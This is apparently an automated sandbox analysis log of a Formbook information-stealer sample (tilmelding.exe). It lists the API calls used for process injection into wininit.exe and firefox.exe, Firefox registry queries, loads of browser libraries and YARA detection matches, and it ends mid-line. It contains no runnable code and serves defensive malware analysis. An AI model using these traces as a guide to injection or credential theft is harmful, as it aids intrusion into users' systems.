      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5E10 NtQueryValueKey,10_2_1EBC5E10
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5C40 NtQueryInformationToken,10_2_1EBC5C40
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5D50 NtQuerySection,10_2_1EBC5D50
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5AE0 NtProtectVirtualMemory,10_2_1EBC5AE0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5BE0 NtQueryInformationFile,10_2_1EBC5BE0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5860 NtOpenDirectoryObject,10_2_1EBC5860
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC59D0 NtOpenThread,10_2_1EBC59D0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5960 NtOpenProcessToken,10_2_1EBC5960
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5950 NtOpenProcess,10_2_1EBC5950
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC54B0 NtEnumerateKey,10_2_1EBC54B0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC54E0 NtEnumerateValueKey,10_2_1EBC54E0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC55E0 NtGetContextThread,10_2_1EBC55E0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5210 NtCreateMutant,10_2_1EBC5210
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5270 NtCreateProcessEx,10_2_1EBC5270
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC51D0 NtCreateKey,10_2_1EBC51D0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC6630 NtWriteFile,10_2_1EBC6630
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC6660 NtWriteVirtualMemory,10_2_1EBC6660
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC65E0 NtWaitForSingleObject,10_2_1EBC65E0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC6200 NtSetInformationFile,10_2_1EBC6200
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC63D0 NtSetValueKey,10_2_1EBC63D0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_00152032 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,10_2_00152032
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_001563FF NtProtectVirtualMemory,10_2_001563FF
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_00156898 NtSetInformationThread,10_2_00156898
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_00152C16 Sleep,NtProtectVirtualMemory,NtProtectVirtualMemory,10_2_00152C16
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_00152C0B Sleep,NtProtectVirtualMemory,10_2_00152C0B
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_00152E4E NtProtectVirtualMemory,CreateFileA,10_2_00152E4E
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_0015057A NtSetInformationThread,10_2_0015057A
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_001568A2 NtSetInformationThread,10_2_001568A2
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_001569F6 NtSetInformationThread,10_2_001569F6
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_00151EB7 CreateThread,CreateThread,TerminateThread,NtProtectVirtualMemory,10_2_00151EB7
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_00151ECA CreateThread,CreateThread,TerminateThread,RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory,10_2_00151ECA
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 0_2_004015700_2_00401570
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAF7FAB1_2_1EAF7FAB
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAA9F901_2_1EAA9F90
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB11FDB1_2_1EB11FDB
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EACDFD41_2_1EACDFD4
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB67F641_2_1EB67F64
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EACDCFB1_2_1EACDCFB
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB05CCD1_2_1EB05CCD
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB65C561_2_1EB65C56
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB0FC461_2_1EB0FC46
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAF5DD81_2_1EAF5DD8
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB4DD511_2_1EB4DD51
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB51AB81_2_1EB51AB8
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAF9A681_2_1EAF9A68
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB0FBA61_2_1EB0FBA6
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB4DB951_2_1EB4DB95
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB678EA1_2_1EB678EA
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAC39841_2_1EAC3984
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB619071_2_1EB61907
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB1B9741_2_1EB1B974
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB139511_2_1EB13951
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAF595C1_2_1EAF595C
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAD36AC1_2_1EAD36AC
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAB96B91_2_1EAB96B9
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAF77C81_2_1EAF77C8
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAFB5941_2_1EAFB594
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAC153A1_2_1EAC153A
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB072C31_2_1EB072C3
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAAF2021_2_1EAAF202
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB650A51_2_1EB650A5
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB6B0E71_2_1EB6B0E7
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAD30CF1_2_1EAD30CF
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAF70151_2_1EAF7015
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAA70781_2_1EAA7078
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB5B04D1_2_1EB5B04D
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAC91F71_2_1EAC91F7
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAC31091_2_1EAC3109
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB52EBA1_2_1EB52EBA
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB1AEF51_2_1EB1AEF5
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EABEEC71_2_1EABEEC7
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAB0E521_2_1EAB0E52
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAD2CAF1_2_1EAD2CAF
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB4ADC51_2_1EB4ADC5
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAF2ADC1_2_1EAF2ADC
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB64BBA1_2_1EB64BBA
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAACBA71_2_1EAACBA7
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAC0BFB1_2_1EAC0BFB
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB4EB7D1_2_1EB4EB7D
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAD28A31_2_1EAD28A3
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB688A21_2_1EB688A2
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB1C8801_2_1EB1C880
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB4C8891_2_1EB4C889
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB749901_2_1EB74990
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAF29EE1_2_1EAF29EE
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAD47361_2_1EAD4736
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB024E11_2_1EB024E1
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAA44FC1_2_1EAA44FC
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EACE4D71_2_1EACE4D7
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_009350A54_2_009350A5
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0093B0E74_2_0093B0E7
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008C70154_2_008C7015
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008770784_2_00877078
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008991F74_2_008991F7
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008931094_2_00893109
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008D72C34_2_008D72C3
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008783EB4_2_008783EB
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0089E4D74_2_0089E4D7
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008D24E14_2_008D24E1
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008744FC4_2_008744FC
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_009404044_2_00940404
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0089C4474_2_0089C447
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008C645A4_2_008C645A
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008CB5944_2_008CB594
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_009365004_2_00936500
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008A36AC4_2_008A36AC
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008896B94_2_008896B9
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008C77C84_2_008C77C8
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_009378EA4_2_009378EA
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_009449904_2_00944990
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008939844_2_00893984
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008C29EE4_2_008C29EE
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_009319074_2_00931907
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008C595C4_2_008C595C
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008E39514_2_008E3951
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008C2ADC4_2_008C2ADC
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008C9A684_2_008C9A68
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0091DB954_2_0091DB95
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0087CBA74_2_0087CBA7
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_00934BBA4_2_00934BBA
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008DFBA64_2_008DFBA6
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_00890BFB4_2_00890BFB
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008D5CCD4_2_008D5CCD
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0089DCFB4_2_0089DCFB
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_00935C564_2_00935C56
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008DFC464_2_008DFC46
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008C5DD84_2_008C5DD8
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0091DD514_2_0091DD51
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0088EEC74_2_0088EEC7
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_00880E524_2_00880E52
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_00879F904_2_00879F90
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008C7FAB4_2_008C7FAB
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0089DFD44_2_0089DFD4
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0007D7BE4_2_0007D7BE
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0007C9444_2_0007C944
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0007CC6B4_2_0007CC6B
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000FF9447_2_000FF944
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000FFC6B7_2_000FFC6B
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000E5D877_2_000E5D87
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000E5D907_2_000E5D90
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000ECF5B7_2_000ECF5B
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000ECF607_2_000ECF60
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_001007BE7_2_001007BE
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000E5FB07_2_000E5FB0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBD7FAB10_2_1EBD7FAB
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EB89F9010_2_1EB89F90
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBF1FDB10_2_1EBF1FDB
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBADFD410_2_1EBADFD4
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBADCFB10_2_1EBADCFB
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBE5CCD10_2_1EBE5CCD
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC45C5610_2_1EC45C56
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBEFC4610_2_1EBEFC46
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBD5DD810_2_1EBD5DD8
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC2DD5110_2_1EC2DD51
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBD9A6810_2_1EBD9A68
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBEFBA610_2_1EBEFBA6
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC2DB9510_2_1EC2DB95
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC478EA10_2_1EC478EA
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBA398410_2_1EBA3984
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC4190710_2_1EC41907
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBFB97410_2_1EBFB974
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBD595C10_2_1EBD595C
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBF395110_2_1EBF3951
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EB996B910_2_1EB996B9
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBB36AC10_2_1EBB36AC
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBD77C810_2_1EBD77C8
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBDB59410_2_1EBDB594
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBA153A10_2_1EBA153A
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBE72C310_2_1EBE72C3
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EB8F20210_2_1EB8F202
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC4B0E710_2_1EC4B0E7
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC450A510_2_1EC450A5
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBB30CF10_2_1EBB30CF
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBD701510_2_1EBD7015
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EB8707810_2_1EB87078
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBA91F710_2_1EBA91F7
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBA310910_2_1EBA3109
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBFAEF510_2_1EBFAEF5
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EB9EEC710_2_1EB9EEC7
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EB90E5210_2_1EB90E52
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBB2CAF10_2_1EBB2CAF
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC2ADC510_2_1EC2ADC5
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBD2ADC10_2_1EBD2ADC
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EB8CBA710_2_1EB8CBA7
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBA0BFB10_2_1EBA0BFB
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC44BBA10_2_1EC44BBA
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBB28A310_2_1EBB28A3
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC2C88910_2_1EC2C889
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBD29EE10_2_1EBD29EE
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC5499010_2_1EC54990
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBB473610_2_1EBB4736
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EB844FC10_2_1EB844FC
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBE24E110_2_1EBE24E1
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBAE4D710_2_1EBAE4D7
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC5040410_2_1EC50404
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBD645A10_2_1EBD645A
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBAC44710_2_1EBAC447
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBB25CB10_2_1EBB25CB
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC4650010_2_1EC46500
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EC4225010_2_1EC42250
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EB883EB10_2_1EB883EB
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBB20EA10_2_1EBB20EA
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: String function: 1EB9F63B appears 249 times
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: String function: 1EBB3D00 appears 41 times
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: String function: 1EC1F3E2 appears 83 times
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: String function: 1EBD2F3C appears 34 times
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: String function: 1EBD2824 appears 109 times
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: String function: 1EBC72D0 appears 34 times
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: String function: 1EBA1ACE appears 132 times
      Source: C:\Windows\System32\wininit.exeCode function: String function: 008A3D00 appears 41 times
      Source: C:\Windows\System32\wininit.exeCode function: String function: 008C2824 appears 73 times
      Source: C:\Windows\System32\wininit.exeCode function: String function: 0088F63B appears 237 times
      Source: C:\Windows\System32\wininit.exeCode function: String function: 00891ACE appears 101 times
      Source: C:\Windows\System32\wininit.exeCode function: String function: 0090F3E2 appears 82 times
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: String function: 1EABF63B appears 193 times
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: String function: 1EAE72D0 appears 31 times
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: String function: 1EAC1ACE appears 99 times
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: String function: 1EB3F3E2 appears 71 times
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: String function: 1EAD3D00 appears 58 times
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: String function: 1EAF2824 appears 90 times
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: String function: 000FDFD0 appears 31 times
      Source: tilmelding.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: gdiddfh.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: gdiddfh.exe0.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: tilmelding.exe, 00000000.00000002.915860603.001E0000.00000008.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs tilmelding.exe
      Source: tilmelding.exe, 00000001.00000002.970730079.00690000.00000008.00000001.sdmpBinary or memory string: OriginalFilenamewship6.dll.muij% vs tilmelding.exe
      Source: tilmelding.exe, 00000001.00000002.973638626.1ECC4000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs tilmelding.exe
      Source: tilmelding.exe, 00000001.00000002.970717305.00670000.00000008.00000001.sdmpBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs tilmelding.exe
      Source: tilmelding.exe, 00000001.00000002.972913794.1DA00000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWinInit.exej% vs tilmelding.exe
      Source: C:\Windows\System32\wininit.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
      Source: C:\Windows\System32\wininit.exeSection loaded: mozglue.dllJump to behavior
      Source: C:\Windows\System32\wininit.exeSection loaded: winsqlite3.dllJump to behavior
      Source: 0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-si